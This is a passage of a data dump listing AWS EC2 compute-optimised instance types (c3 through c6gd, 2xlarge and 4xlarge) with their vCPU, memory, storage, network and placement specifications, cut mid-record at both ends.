'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64']}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 7168}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1680, 'Disks': [{'SizeInGB': 420, 'Count': 4, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 
'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 
'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': 
False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 
'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 
'SizeInMiB': 16384, 'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 21504, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 
'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 21504}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 
'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 16384, 'TotalSizeInGB': 474, 'Disks': [{'SizeInGB': 474, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 474, 'Disks': [{'SizeInGB': 474, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': 
{'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': 
['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 
'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': 
False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': 
{'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 
